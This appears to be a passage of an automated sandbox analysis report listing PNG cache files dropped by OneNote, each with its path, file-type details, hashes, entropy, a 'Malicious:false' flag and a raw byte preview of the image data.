                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
